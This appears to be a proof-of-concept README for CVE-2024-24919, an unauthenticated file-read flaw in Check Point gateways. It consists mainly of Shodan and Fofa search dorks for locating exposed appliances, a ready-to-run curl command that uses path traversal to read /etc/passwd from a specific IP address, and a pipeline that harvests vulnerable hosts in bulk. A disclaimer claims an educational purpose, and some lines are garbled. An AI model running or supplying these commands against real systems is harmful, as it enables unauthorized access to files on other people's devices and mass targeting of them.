CVE-2024-24919-POC

The vulnerability allows an unauthenticated remote attacker to read the contents of an arbitrary file located on the affected appliance.

Shodan Dork: title:"Check Point" || "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

Fofa Dork: app="Check_Point-SSL-Network-Extender"

This POC is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

title:"Check Point" ssl:"target \

curl --path-as-is -i -s -k -X $'POST'
-H $'Host: 212.179.13.8' -H $'Content-Length: 39' -H $'Connection: keep-alive'
--data-binary $'aCSHELL/../../../../../../../etc/passwd'
$'https://212.179.13.8/clients/MyCRL' \

shodan search --fields ip_str,port,org "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" > search.txt \

awk '{print $1}' search.txt > results.txt
cat results.txt | hakip2host
https://github.com/hakluke/hakip2host

https://www.youtube.com/watch?v=PAWvQ3y0T2g